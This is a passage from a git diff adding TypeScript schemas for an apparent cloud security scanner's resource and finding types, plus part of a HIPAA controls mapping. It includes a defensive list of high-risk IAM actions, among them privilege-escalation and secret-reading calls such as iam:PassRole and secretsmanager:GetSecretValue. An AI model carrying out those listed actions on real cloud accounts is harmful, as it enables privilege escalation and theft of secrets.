+  })
+  export type IAMGroup = z.infer<typeof IAMGroup>
+
+  /**
+   * IAM role.
+   */
+  export const IAMRole = z.object({
+    id: z.string(),
+    arn: z.string().optional(),
+    name: z.string(),
+    provider: CloudProvider,
+    description: z.string().optional(),
+    trustPolicy: z.record(z.string(), z.unknown()).optional(),
+    trustedEntities: z.array(z.string()).default([]),
+    inlinePolicies: z.array(z.string()).default([]),
+    attachedPolicies: z.array(z.string()).default([]),
+    assumableBy: z.array(z.string()).default([]),
+    createdAt: z.number().optional(),
+    lastUsed: z.number().optional(),
+    isServiceLinked: z.boolean().default(false),
+    issues: z.array(z.string()).default([]),
+  })
+  export type IAMRole = z.infer<typeof IAMRole>
+
+  // ============================================
+  // Storage Types
+  // ============================================
+
+  /**
+   * Bucket ACL entry.
+   */
+  export const BucketACL = z.object({
+    grantee: z.string(),
+    permission: z.enum(["FULL_CONTROL", "WRITE", "WRITE_ACP", "READ", "READ_ACP"]),
+    type: z.enum(["user", "group", "everyone"]),
+  })
+  export type BucketACL = z.infer<typeof BucketACL>
+
+  /**
+   * Bucket encryption configuration.
+   */
+  export const BucketEncryption = z.object({
+    enabled: z.boolean(),
+    algorithm: z.string().optional(),
+    keyId: z.string().optional(),
+    customerManaged: z.boolean().default(false),
+  })
+  export type BucketEncryption = z.infer<typeof BucketEncryption>
+
+  /**
+   * Storage bucket (S3/Blob/GCS).
+   */
+  export const StorageBucket = z.object({
+    id: z.string(),
+    arn: z.string().optional(),
+    name: z.string(),
+    provider: CloudProvider,
+    region: z.string().optional(),
+    createdAt: z.number().optional(),
+    // Access control
+    accessLevel: AccessLevel,
+    publicAccessBlocked: z.boolean().default(true),
+    aclEnabled: z.boolean().default(false),
+    acls: z.array(BucketACL).default([]),
+    // Security features
+    encryption: BucketEncryption.optional(),
+    versioningEnabled: z.boolean().default(false),
+    loggingEnabled: z.boolean().default(false),
+    mfaDeleteRequired: z.boolean().default(false),
+    // Policy
+    bucketPolicy: z.record(z.string(), z.unknown()).optional(),
+    hasPolicyPublicAccess: z.boolean().default(false),
+    // Issues
+    issues: z.array(z.string()).default([]),
+    sensitiveData: z.boolean().optional(),
+    objectCount: z.number().optional(),
+    totalSize: z.number().optional(),
+  })
+  export type StorageBucket = z.infer<typeof StorageBucket>
+
+  // ============================================
+  // Network Types
+  // ============================================
+
+  /**
+   * Network rule direction.
+   */
+  export const RuleDirection = z.enum(["inbound", "outbound"])
+  export type RuleDirection = z.infer<typeof RuleDirection>
+
+  /**
+   * Security group rule.
+   */
+  export const SecurityGroupRule = z.object({
+    id: z.string().optional(),
+    direction: RuleDirection,
+    protocol: z.string(),
+    portRange: z.object({
+      from: z.number(),
+      to: z.number(),
+    }).optional(),
+    source: z.string(), // CIDR, security group ID, or prefix list
+    destination: z.string().optional(),
+    description: z.string().optional(),
+    isPublic: z.boolean().default(false),
+    issues: z.array(z.string()).default([]),
+  })
+  export type SecurityGroupRule = z.infer<typeof SecurityGroupRule>
+
+  /**
+   * Security group (AWS SG, Azure NSG, GCP Firewall).
+   */
+  export const SecurityGroup = z.object({
+    id: z.string(),
+    arn: z.string().optional(),
+    name: z.string(),
+    provider: CloudProvider,
+    description: z.string().optional(),
+    vpcId: z.string().optional(),
+    region: z.string().optional(),
+    rules: z.array(SecurityGroupRule).default([]),
+    attachedResources: z.array(z.string()).default([]),
+    hasPublicIngress: z.boolean().default(false),
+    hasUnrestrictedIngress: z.boolean().default(false),
+    issues: z.array(z.string()).default([]),
+    tags: z.array(ResourceTag).default([]),
+  })
+  export type SecurityGroup = z.infer<typeof SecurityGroup>
+
+  /**
+   * VPC/Virtual Network.
+   */
+  export const VirtualNetwork = z.object({
+    id: z.string(),
+    arn: z.string().optional(),
+    name: z.string(),
+    provider: CloudProvider,
+    region: z.string().optional(),
+    cidrBlock: z.string(),
+    isDefault: z.boolean().default(false),
+    subnets: z.array(z.string()).default([]),
+    securityGroups: z.array(z.string()).default([]),
+    flowLogsEnabled: z.boolean().default(false),
+    issues: z.array(z.string()).default([]),
+  })
+  export type VirtualNetwork = z.infer<typeof VirtualNetwork>
+
+  // ============================================
+  // Compute Types
+  // ============================================
+
+  /**
+   * Compute instance (EC2, Azure VM, GCE).
+   */
+  export const ComputeInstance = z.object({
+    id: z.string(),
+    arn: z.string().optional(),
+    name: z.string(),
+    provider: CloudProvider,
+    region: z.string().optional(),
+    instanceType: z.string().optional(),
+    state: z.enum(["running", "stopped", "terminated", "pending", "unknown"]),
+    publicIp: z.string().optional(),
+    privateIp: z.string().optional(),
+    vpcId: z.string().optional(),
+    subnetId: z.string().optional(),
+    securityGroups: z.array(z.string()).default([]),
+    iamRole: z.string().optional(),
+    // Security settings
+    publiclyAccessible: z.boolean().default(false),
+    imdsV2Required: z.boolean().default(false),
+    encryptedVolumes: z.boolean().default(false),
+    sshKeyName: z.string().optional(),
+    // Issues
+    issues: z.array(z.string()).default([]),
+    tags: z.array(ResourceTag).default([]),
+  })
+  export type ComputeInstance = z.infer<typeof ComputeInstance>
+
+  /**
+   * Serverless function (Lambda, Azure Function, Cloud Function).
+   */
+  export const ServerlessFunction = z.object({
+    id: z.string(),
+    arn: z.string().optional(),
+    name: z.string(),
+    provider: CloudProvider,
+    region: z.string().optional(),
+    runtime: z.string().optional(),
+    handler: z.string().optional(),
+    role: z.string().optional(),
+    vpcConfig: z.object({
+      vpcId: z.string(),
+      subnetIds: z.array(z.string()),
+      securityGroupIds: z.array(z.string()),
+    }).optional(),
+    // Security settings
+    publiclyAccessible: z.boolean().default(false),
+    envVarsWithSecrets: z.array(z.string()).default([]),
+    hasResourcePolicy: z.boolean().default(false),
+    // Issues
+    issues: z.array(z.string()).default([]),
+    tags: z.array(ResourceTag).default([]),
+  })
+  export type ServerlessFunction = z.infer<typeof ServerlessFunction>
+
+  // ============================================
+  // Compliance Types
+  // ============================================
+
+  /**
+   * Compliance check result.
+   */
+  export const ComplianceCheck = z.object({
+    id: z.string(),
+    framework: ComplianceFramework,
+    controlId: z.string(),
+    controlTitle: z.string(),
+    description: z.string(),
+    severity: Severity,
+    status: z.enum(["passed", "failed", "warning", "skipped"]),
+    resourceType: ResourceType.optional(),
+    resourceId: z.string().optional(),
+    resourceArn: z.string().optional(),
+    region: z.string().optional(),
+    finding: z.string().optional(),
+    remediation: z.string().optional(),
+    documentation: z.string().optional(),
+    checkedAt: z.number(),
+  })
+  export type ComplianceCheck = z.infer<typeof ComplianceCheck>
+
+  /**
+   * Compliance summary by framework.
+   */
+  export const ComplianceSummary = z.object({
+    framework: ComplianceFramework,
+    passed: z.number(),
+    failed: z.number(),
+    warnings: z.number(),
+    skipped: z.number(),
+    score: z.number(), // Percentage
+    checkedAt: z.number(),
+  })
+  export type ComplianceSummary = z.infer<typeof ComplianceSummary>
+
+  // ============================================
+  // Finding Types
+  // ============================================
+
+  /**
+   * Cloud security finding.
+   */
+  export const CloudFinding = z.object({
+    id: z.string(),
+    provider: CloudProvider,
+    region: z.string().optional(),
+    account: z.string().optional(),
+    severity: Severity,
+    title: z.string(),
+    description: z.string(),
+    resourceType: ResourceType.optional(),
+    resourceId: z.string().optional(),
+    resourceArn: z.string().optional(),
+    category: z.enum([
+      "iam",
+      "storage",
+      "network",
+      "compute",
+      "encryption",
+      "logging",
+      "compliance",
+      "configuration",
+      "other",
+    ]),
+    complianceFrameworks: z.array(ComplianceFramework).default([]),
+    remediation: z.string().optional(),
+    references: z.array(z.string()).default([]),
+    rawData: z.record(z.string(), z.unknown()).optional(),
+    foundAt: z.number(),
+    source: z.enum(["scanner", "prowler", "scoutsuite", "cli"]).default("scanner"),
+  })
+  export type CloudFinding = z.infer<typeof CloudFinding>
+
+  // ============================================
+  // Scan Profile Types
+  // ============================================
+
+  /**
+   * IAM scan options.
+   */
+  export const IAMScanOptions = z.object({
+    enabled: z.boolean().default(true),
+    users: z.boolean().default(true),
+    groups: z.boolean().default(true),
+    roles: z.boolean().default(true),
+    policies: z.boolean().default(true),
+    accessKeys: z.boolean().default(true),
+    mfaCheck: z.boolean().default(true),
+    permissionAnalysis: z.boolean().default(false),
+    unusedCredentials: z.boolean().default(false),
+  })
+  export type IAMScanOptions = z.infer<typeof IAMScanOptions>
+
+  /**
+   * Storage scan options.
+   */
+  export const StorageScanOptions = z.object({
+    enabled: z.boolean().default(true),
+    buckets: z.boolean().default(true),
+    publicAccess: z.boolean().default(true),
+    encryption: z.boolean().default(true),
+    logging: z.boolean().default(true),
+    versioning: z.boolean().default(true),
+    bucketPolicies: z.boolean().default(false),
+  })
+  export type StorageScanOptions = z.infer<typeof StorageScanOptions>
+
+  /**
+   * Network scan options.
+   */
+  export const NetworkScanOptions = z.object({
+    enabled: z.boolean().default(true),
+    securityGroups: z.boolean().default(true),
+    publicIngress: z.boolean().default(true),
+    vpcs: z.boolean().default(true),
+    flowLogs: z.boolean().default(false),
+    nacls: z.boolean().default(false),
+  })
+  export type NetworkScanOptions = z.infer<typeof NetworkScanOptions>
+
+  /**
+   * Compute scan options.
+   */
+  export const ComputeScanOptions = z.object({
+    enabled: z.boolean().default(true),
+    instances: z.boolean().default(true),
+    publicExposure: z.boolean().default(true),
+    imdsCheck: z.boolean().default(true),
+    functions: z.boolean().default(true),
+    containers: z.boolean().default(false),
+  })
+  export type ComputeScanOptions = z.infer<typeof ComputeScanOptions>
+
+  /**
+   * Compliance scan options.
+   */
+  export const ComplianceScanOptions = z.object({
+    enabled: z.boolean().default(false),
+    frameworks: z.array(ComplianceFramework).default([]),
+    useProwler: z.boolean().default(false),
+    useScoutSuite: z.boolean().default(false),
+  })
+  export type ComplianceScanOptions = z.infer<typeof ComplianceScanOptions>
+
+  /**
+   * Scan phases.
+   */
+  export const ScanPhase = z.enum(["discovery", "security", "compliance"])
+  export type ScanPhase = z.infer<typeof ScanPhase>
+
+  /**
+   * External tools configuration.
+   */
+  export const ExternalToolsConfig = z.object({
+    prowler: z.boolean().default(false),
+    scoutsuite: z.boolean().default(false),
+  })
+  export type ExternalToolsConfig = z.infer<typeof ExternalToolsConfig>
+
+  /**
+   * Scan profile.
+   */
+  export const ScanProfile = z.object({
+    id: ProfileId,
+    name: z.string(),
+    description: z.string(),
+    phases: z.array(ScanPhase).default(["discovery", "security"]),
+    externalTools: ExternalToolsConfig.default({ prowler: false, scoutsuite: false }),
+    complianceFrameworks: z.array(ComplianceFramework).default([]),
+    resourceTypes: z.array(z.string()).default([]),
+    modules: z.object({
+      iam: IAMScanOptions,
+      storage: StorageScanOptions,
+      network: NetworkScanOptions,
+      compute: ComputeScanOptions,
+      compliance: ComplianceScanOptions,
+    }),
+    timeout: z.number().default(300000),
+    rateLimit: z.number().optional(),
+    maxConcurrent: z.number().optional(),
+  })
+  export type ScanProfile = z.infer<typeof ScanProfile>
+
+  // ============================================
+  // Scan Result Types
+  // ============================================
+
+  /**
+   * Cloud scan statistics.
+   */
+  export const CloudScanStats = z.object({
+    resourcesDiscovered: z.number().default(0),
+    resourcesScanned: z.number().default(0),
+    usersFound: z.number().default(0),
+    rolesFound: z.number().default(0),
+    policiesFound: z.number().default(0),
+    bucketsFound: z.number().default(0),
+    securityGroupsFound: z.number().default(0),
+    instancesFound: z.number().default(0),
+    functionsFound: z.number().default(0),
+    findingsCount: z.number().default(0),
+    criticalCount: z.number().default(0),
+    highCount: z.number().default(0),
+    mediumCount: z.number().default(0),
+    lowCount: z.number().default(0),
+    infoCount: z.number().default(0),
+    complianceScore: z.number().optional(),
+    duration: z.number().default(0),
+  })
+  export type CloudScanStats = z.infer<typeof CloudScanStats>
+
+  /**
+   * Cloud scan result.
+   */
+  export const CloudScanResult = z.object({
+    id: z.string(),
+    provider: CloudProvider,
+    region: z.string().optional(),
+    account: z.string().optional(),
+    profile: ProfileId,
+    credentials: z.record(z.string(), z.unknown()).optional(),
+    // Resources
+    resources: z.array(CloudResource).default([]),
+    principals: z.array(IAMPrincipal).default([]),
+    groups: z.array(IAMGroup).default([]),
+    roles: z.array(IAMRole).default([]),
+    policies: z.array(IAMPolicy).default([]),
+    buckets: z.array(StorageBucket).default([]),
+    securityGroups: z.array(SecurityGroup).default([]),
+    vpcs: z.array(VirtualNetwork).default([]),
+    instances: z.array(ComputeInstance).default([]),
+    functions: z.array(ServerlessFunction).default([]),
+    // Findings
+    findings: z.array(CloudFinding).default([]),
+    complianceChecks: z.array(ComplianceCheck).default([]),
+    complianceSummaries: z.array(ComplianceSummary).default([]),
+    // Metadata
+    stats: CloudScanStats,
+    startedAt: z.number(),
+    completedAt: z.number().optional(),
+    status: Status,
+    error: z.string().optional(),
+  })
+  export type CloudScanResult = z.infer<typeof CloudScanResult>
+
+  // ============================================
+  // External Tool Output Types
+  // ============================================
+
+  /**
+   * Prowler finding.
+   */
+  export const ProwlerFinding = z.object({
+    checkId: z.string(),
+    checkTitle: z.string(),
+    status: z.enum(["PASS", "FAIL", "INFO", "WARNING"]),
+    severity: z.string(),
+    service: z.string(),
+    region: z.string().optional(),
+    accountId: z.string().optional(),
+    resourceId: z.string().optional(),
+    resourceArn: z.string().optional(),
+    statusExtended: z.string().optional(),
+    resourceDetails: z.string().optional(),
+    risk: z.string().optional(),
+    remediation: z.string().optional(),
+    compliance: z.record(z.string(), z.array(z.string())).optional(),
+  })
+  export type ProwlerFinding = z.infer<typeof ProwlerFinding>
+
+  /**
+   * ScoutSuite finding.
+   */
+  export const ScoutSuiteFinding = z.object({
+    checkId: z.string(),
+    description: z.string(),
+    level: z.enum(["danger", "warning", "info"]),
+    service: z.string(),
+    path: z.string(),
+    items: z.array(z.string()).default([]),
+    flaggedItems: z.number().default(0),
+    checkedItems: z.number().default(0),
+    rationale: z.string().optional(),
+    remediation: z.string().optional(),
+    references: z.array(z.string()).default([]),
+    compliance: z.array(z.object({
+      name: z.string(),
+      reference: z.string().optional(),
+    })).default([]),
+  })
+  export type ScoutSuiteFinding = z.infer<typeof ScoutSuiteFinding>
+
+  // ============================================
+  // Constants
+  // ============================================
+
+  /**
+   * High-risk IAM actions.
+   */
+  export const HIGH_RISK_ACTIONS = [
+    "*",
+    "iam:*",
+    "iam:CreateUser",
+    "iam:CreateAccessKey",
+    "iam:AttachUserPolicy",
+    "iam:AttachRolePolicy",
+    "iam:PutUserPolicy",
+    "iam:PutRolePolicy",
+    "iam:PassRole",
+    "iam:CreatePolicyVersion",
+    "sts:AssumeRole",
+    "lambda:InvokeFunction",
+    "lambda:CreateFunction",
+    "lambda:UpdateFunctionCode",
+    "ec2:RunInstances",
+    "s3:*",
+    "s3:PutBucketPolicy",
+    "s3:DeleteBucketPolicy",
+    "kms:*",
+    "secretsmanager:GetSecretValue",
+    "ssm:GetParameter",
+    "ssm:GetParameters",
+  ]
+
+  /**
+   * Common public CIDR blocks.
+   */
+  export const PUBLIC_CIDRS = ["0.0.0.0/0", "::/0"]
+
+  /**
+   * Sensitive port numbers.
+   */
+  export const SENSITIVE_PORTS: Record<number, string> = {
+    22: "SSH",
+    23: "Telnet",
+    25: "SMTP",
+    53: "DNS",
+    80: "HTTP",
+    110: "POP3",
+    135: "RPC",
+    139: "NetBIOS",
+    143: "IMAP",
+    389: "LDAP",
+    443: "HTTPS",
+    445: "SMB",
+    465: "SMTPS",
+    587: "SMTP Submission",
+    636: "LDAPS",
+    993: "IMAPS",
+    995: "POP3S",
+    1433: "MSSQL",
+    1521: "Oracle",
+    3306: "MySQL",
+    3389: "RDP",
+    5432: "PostgreSQL",
+    5900: "VNC",
+    6379: "Redis",
+    8080: "HTTP Alt",
+    8443: "HTTPS Alt",
+    9200: "Elasticsearch",
+    27017: "MongoDB",
+  }
+
+  /**
+   * AWS regions.
+   */
+  export const AWS_REGIONS = [
+    "us-east-1",
+    "us-east-2",
+    "us-west-1",
+    "us-west-2",
+    "af-south-1",
+    "ap-east-1",
+    "ap-south-1",
+    "ap-northeast-1",
+    "ap-northeast-2",
+    "ap-northeast-3",
+    "ap-southeast-1",
+    "ap-southeast-2",
+    "ca-central-1",
+    "eu-central-1",
+    "eu-west-1",
+    "eu-west-2",
+    "eu-west-3",
+    "eu-north-1",
+    "eu-south-1",
+    "me-south-1",
+    "sa-east-1",
+  ]
+
+  /**
+   * Azure regions.
+   */
+  export const AZURE_REGIONS = [
+    "eastus",
+    "eastus2",
+    "westus",
+    "westus2",
+    "centralus",
+    "northcentralus",
+    "southcentralus",
+    "westcentralus",
+    "canadacentral",
+    "canadaeast",
+    "brazilsouth",
+    "northeurope",
+    "westeurope",
+    "ukwest",
+    "uksouth",
+    "francecentral",
+    "francesouth",
+    "switzerlandnorth",
+    "germanywestcentral",
+    "norwayeast",
+    "eastasia",
+    "southeastasia",
+    "japaneast",
+    "japanwest",
+    "australiaeast",
+    "australiasoutheast",
+    "centralindia",
+    "southindia",
+    "koreacentral",
+  ]
+
+  /**
+   * GCP regions.
+   */
+  export const GCP_REGIONS = [
+    "us-central1",
+    "us-east1",
+    "us-east4",
+    "us-west1",
+    "us-west2",
+    "us-west3",
+    "us-west4",
+    "northamerica-northeast1",
+    "southamerica-east1",
+    "europe-north1",
+    "europe-west1",
+    "europe-west2",
+    "europe-west3",
+    "europe-west4",
+    "europe-west6",
+    "asia-east1",
+    "asia-east2",
+    "asia-northeast1",
+    "asia-northeast2",
+    "asia-northeast3",
+    "asia-south1",
+    "asia-southeast1",
+    "asia-southeast2",
+    "australia-southeast1",
+  ]
+}
diff --git a/packages/opencode/src/pentest/compliance/frameworks/hipaa.ts b/packages/opencode/src/pentest/compliance/frameworks/hipaa.ts
new file mode 100644
index 00000000000..9a781cbab67
--- /dev/null
+++ b/packages/opencode/src/pentest/compliance/frameworks/hipaa.ts
@@ -0,0 +1,515 @@
+/**
+ * @fileoverview HIPAA Controls
+ *
+ * Health Insurance Portability and Accountability Act security controls for compliance mapping.
+ *
+ * @module pentest/compliance/frameworks/hipaa
+ */
+
+import type { ComplianceTypes } from "../types"
+
+export const HIPAA_FRAMEWORK: ComplianceTypes.Framework = {
+  id: "hipaa",
+  name: "HIPAA Security Rule",
+  version: "2024",
+  description: "Health Insurance Portability and Accountability Act - Security standards for protecting ePHI",
+  categories: [
+    { id: "admin", name: "Administrative Safeguards", description: "Administrative actions and policies to manage security" },
+    { id: "physical", name: "Physical Safeguards", description: "Physical measures to protect electronic systems" },
+    { id: "technical", name: "Technical Safeguards", description: "Technology and policies to protect and control access to ePHI" },
+    { id: "organizational", name: "Organizational Requirements", description: "Business associate and documentation requirements" },
+    { id: "policies", name: "Policies and Procedures", description: "Documentation requirements" },
+  ],
+  controlCount: 42,
+}
+
+export const HIPAA_CONTROLS: ComplianceTypes.ComplianceControl[] = [
+  // Administrative Safeguards (45 CFR 164.308)
+  {
+    id: "164.308(a)(1)(i)",
+    framework: "hipaa",
+    category: "admin",
+    name: "Security Management Process",
+    description: "Implement policies and procedures to prevent, detect, contain, and correct security violations",
+    priority: "critical",
+    keywords: ["security management", "policy", "procedure", "governance"],
+    services: [],
+    severities: [],
+    remediation: "Develop comprehensive security management program",
+  },
+  {
+    id: "164.308(a)(1)(ii)(A)",
+    framework: "hipaa",
+    category: "admin",
+    name: "Risk Analysis",
+    description: "Conduct accurate and thorough assessment of potential risks to ePHI",
+    priority: "critical",
+    keywords: ["risk analysis", "risk assessment", "threat", "vulnerability"],
+    services: [],
+    severities: ["critical", "high", "medium"],
+    remediation: "Perform comprehensive risk assessment annually",
+  },
+  {
+    id: "164.308(a)(1)(ii)(B)",
+    framework: "hipaa",
+    category: "admin",
+    name: "Risk Management",
+    description: "Implement security measures to reduce risks to reasonable and appropriate level",
+    priority: "critical",
+    keywords: ["risk management", "mitigation", "remediation", "security measures"],
+    services: [],
+    severities: ["critical", "high"],
+    remediation: "Implement controls to mitigate identified risks",
+  },
+  {
+    id: "164.308(a)(1)(ii)(C)",
+    framework: "hipaa",
+    category: "admin",
+    name: "Sanction Policy",
+    description: "Apply appropriate sanctions against workforce members who fail to comply",
+    priority: "medium",
+    keywords: ["sanction", "discipline", "policy violation", "non-compliance"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "164.308(a)(1)(ii)(D)",
+    framework: "hipaa",
+    category: "admin",
+    name: "Information System Activity Review",
+    description: "Implement procedures to regularly review information system activity",
+    priority: "high",
+    keywords: ["audit", "review", "monitoring", "log review", "activity"],
+    services: [],
+    severities: ["high", "medium"],
+    remediation: "Implement regular system activity reviews",
+  },
+  {
+    id: "164.308(a)(2)",
+    framework: "hipaa",
+    category: "admin",
+    name: "Assigned Security Responsibility",
+    description: "Identify the security official responsible for HIPAA security policies and procedures",
+    priority: "high",
+    keywords: ["security officer", "ciso", "responsibility", "designated"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "164.308(a)(3)(i)",
+    framework: "hipaa",
+    category: "admin",
+    name: "Workforce Security",
+    description: "Implement policies to ensure workforce members have appropriate access to ePHI",
+    priority: "high",
+    keywords: ["workforce", "access", "authorization", "clearance"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "164.308(a)(3)(ii)(A)",
+    framework: "hipaa",
+    category: "admin",
+    name: "Authorization/Supervision",
+    description: "Implement procedures for authorization and/or supervision of workforce members",
+    priority: "high",
+    keywords: ["authorization", "supervision", "access approval"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "164.308(a)(3)(ii)(B)",
+    framework: "hipaa",
+    category: "admin",
+    name: "Workforce Clearance Procedure",
+    description: "Implement procedures to determine appropriate access for workforce members",
+    priority: "medium",
+    keywords: ["clearance", "background check", "access determination"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "164.308(a)(3)(ii)(C)",
+    framework: "hipaa",
+    category: "admin",
+    name: "Termination Procedures",
+    description: "Implement procedures for terminating access when employment ends",
+    priority: "high",
+    keywords: ["termination", "offboarding", "revoke access", "deprovisioning"],
+    services: [],
+    severities: ["high", "medium"],
+    remediation: "Implement timely access revocation procedures",
+  },
+  {
+    id: "164.308(a)(4)(i)",
+    framework: "hipaa",
+    category: "admin",
+    name: "Information Access Management",
+    description: "Implement policies for authorizing access to ePHI",
+    priority: "high",
+    keywords: ["access management", "authorization", "need-to-know"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "164.308(a)(5)(i)",
+    framework: "hipaa",
+    category: "admin",
+    name: "Security Awareness Training",
+    description: "Implement security awareness and training program for workforce",
+    priority: "high",
+    keywords: ["training", "awareness", "education", "security awareness"],
+    services: [],
+    severities: [],
+    remediation: "Implement regular security awareness training",
+  },
+  {
+    id: "164.308(a)(5)(ii)(B)",
+    framework: "hipaa",
+    category: "admin",
+    name: "Protection from Malicious Software",
+    description: "Implement procedures for guarding against and detecting malicious software",
+    priority: "high",
+    keywords: ["malware", "antivirus", "malicious software", "virus"],
+    services: [],
+    severities: ["high", "medium"],
+    remediation: "Deploy and maintain anti-malware solutions",
+  },
+  {
+    id: "164.308(a)(5)(ii)(C)",
+    framework: "hipaa",
+    category: "admin",
+    name: "Log-in Monitoring",
+    description: "Implement procedures for monitoring log-in attempts and reporting discrepancies",
+    priority: "high",
+    keywords: ["login", "authentication", "monitoring", "failed attempt"],
+    services: [],
+    severities: ["high", "medium"],
+    remediation: "Implement login attempt monitoring and alerting",
+  },
+  {
+    id: "164.308(a)(5)(ii)(D)",
+    framework: "hipaa",
+    category: "admin",
+    name: "Password Management",
+    description: "Implement procedures for creating, changing, and safeguarding passwords",
+    priority: "high",
+    keywords: ["password", "credential", "authentication", "complexity"],
+    services: [],
+    severities: ["high", "medium"],
+    remediation: "Implement strong password policies",
+  },
+  {
+    id: "164.308(a)(6)(i)",
+    framework: "hipaa",
+    category: "admin",
+    name: "Security Incident Procedures",
+    description: "Implement policies for addressing security incidents",
+    priority: "critical",
+    keywords: ["incident", "breach", "response", "security incident"],
+    services: [],
+    severities: ["critical", "high"],
+    remediation: "Develop incident response procedures",
+  },
+  {
+    id: "164.308(a)(7)(i)",
+    framework: "hipaa",
+    category: "admin",
+    name: "Contingency Plan",
+    description: "Establish policies for responding to emergency or disaster",
+    priority: "high",
+    keywords: ["contingency", "disaster recovery", "business continuity", "backup"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "164.308(a)(7)(ii)(A)",
+    framework: "hipaa",
+    category: "admin",
+    name: "Data Backup Plan",
+    description: "Establish procedures to create and maintain retrievable exact copies of ePHI",
+    priority: "high",
+    keywords: ["backup", "data protection", "recovery", "copy"],
+    services: [],
+    severities: [],
+    remediation: "Implement regular data backup procedures",
+  },
+  {
+    id: "164.308(a)(8)",
+    framework: "hipaa",
+    category: "admin",
+    name: "Evaluation",
+    description: "Perform periodic technical and nontechnical evaluation of security",
+    priority: "high",
+    keywords: ["evaluation", "assessment", "audit", "review"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+
+  // Physical Safeguards (45 CFR 164.310)
+  {
+    id: "164.310(a)(1)",
+    framework: "hipaa",
+    category: "physical",
+    name: "Facility Access Controls",
+    description: "Implement policies to limit physical access to electronic systems",
+    priority: "high",
+    keywords: ["physical access", "facility", "building", "data center"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "164.310(a)(2)(ii)",
+    framework: "hipaa",
+    category: "physical",
+    name: "Facility Security Plan",
+    description: "Implement policies to safeguard facility and equipment from unauthorized access",
+    priority: "high",
+    keywords: ["facility security", "physical security", "access control"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "164.310(b)",
+    framework: "hipaa",
+    category: "physical",
+    name: "Workstation Use",
+    description: "Implement policies for proper workstation use and access",
+    priority: "medium",
+    keywords: ["workstation", "computer", "terminal", "endpoint"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "164.310(c)",
+    framework: "hipaa",
+    category: "physical",
+    name: "Workstation Security",
+    description: "Implement physical safeguards for workstations that access ePHI",
+    priority: "medium",
+    keywords: ["workstation", "physical security", "screen lock", "secure area"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "164.310(d)(1)",
+    framework: "hipaa",
+    category: "physical",
+    name: "Device and Media Controls",
+    description: "Implement policies for receipt and removal of hardware and electronic media",
+    priority: "high",
+    keywords: ["media", "device", "hardware", "disposal", "sanitization"],
+    services: [],
+    severities: ["high", "medium"],
+    remediation: "Implement media handling and disposal procedures",
+  },
+  {
+    id: "164.310(d)(2)(i)",
+    framework: "hipaa",
+    category: "physical",
+    name: "Disposal",
+    description: "Implement procedures for final disposal of ePHI and hardware",
+    priority: "high",
+    keywords: ["disposal", "destruction", "sanitization", "wipe"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "164.310(d)(2)(ii)",
+    framework: "hipaa",
+    category: "physical",
+    name: "Media Re-use",
+    description: "Implement procedures for removal of ePHI before media re-use",
+    priority: "high",
+    keywords: ["media reuse", "sanitization", "wiping", "clearing"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+
+  // Technical Safeguards (45 CFR 164.312)
+  {
+    id: "164.312(a)(1)",
+    framework: "hipaa",
+    category: "technical",
+    name: "Access Control",
+    description: "Implement technical policies to allow access only to authorized persons",
+    priority: "critical",
+    keywords: ["access control", "authentication", "authorization", "login"],
+    services: [],
+    severities: ["critical", "high"],
+    remediation: "Implement role-based access controls",
+  },
+  {
+    id: "164.312(a)(2)(i)",
+    framework: "hipaa",
+    category: "technical",
+    name: "Unique User Identification",
+    description: "Assign unique name/number for identifying and tracking user identity",
+    priority: "high",
+    keywords: ["unique id", "user identification", "tracking", "accountability"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "164.312(a)(2)(ii)",
+    framework: "hipaa",
+    category: "technical",
+    name: "Emergency Access Procedure",
+    description: "Establish procedures for obtaining necessary ePHI during an emergency",
+    priority: "medium",
+    keywords: ["emergency", "break glass", "emergency access"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "164.312(a)(2)(iii)",
+    framework: "hipaa",
+    category: "technical",
+    name: "Automatic Logoff",
+    description: "Implement procedures that terminate session after inactivity",
+    priority: "medium",
+    keywords: ["session timeout", "automatic logoff", "idle", "inactivity"],
+    services: [],
+    severities: ["medium"],
+    remediation: "Configure automatic session timeouts",
+  },
+  {
+    id: "164.312(a)(2)(iv)",
+    framework: "hipaa",
+    category: "technical",
+    name: "Encryption and Decryption",
+    description: "Implement mechanism to encrypt and decrypt ePHI",
+    priority: "critical",
+    keywords: ["encryption", "decryption", "cryptography", "cipher"],
+    services: [],
+    severities: ["critical", "high"],
+    remediation: "Implement encryption for ePHI at rest",
+  },
+  {
+    id: "164.312(b)",
+    framework: "hipaa",
+    category: "technical",
+    name: "Audit Controls",
+    description: "Implement mechanisms to record and examine activity in systems",
+    priority: "high",
+    keywords: ["audit", "logging", "monitoring", "trail", "activity"],
+    services: [],
+    severities: ["high", "medium"],
+    remediation: "Implement comprehensive audit logging",
+  },
+  {
+    id: "164.312(c)(1)",
+    framework: "hipaa",
+    category: "technical",
+    name: "Integrity",
+    description: "Implement policies to protect ePHI from improper alteration or destruction",
+    priority: "high",
+    keywords: ["integrity", "tamper", "modification", "alteration"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "164.312(c)(2)",
+    framework: "hipaa",
+    category: "technical",
+    name: "Mechanism to Authenticate ePHI",
+    description: "Implement electronic mechanisms to corroborate that ePHI has not been altered",
+    priority: "medium",
+    keywords: ["integrity", "hash", "checksum", "digital signature"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "164.312(d)",
+    framework: "hipaa",
+    category: "technical",
+    name: "Person or Entity Authentication",
+    description: "Implement procedures to verify identity of person or entity seeking access",
+    priority: "critical",
+    keywords: ["authentication", "identity", "verification", "mfa", "multi-factor"],
+    services: [],
+    severities: ["critical", "high"],
+    remediation: "Implement strong authentication mechanisms",
+  },
+  {
+    id: "164.312(e)(1)",
+    framework: "hipaa",
+    category: "technical",
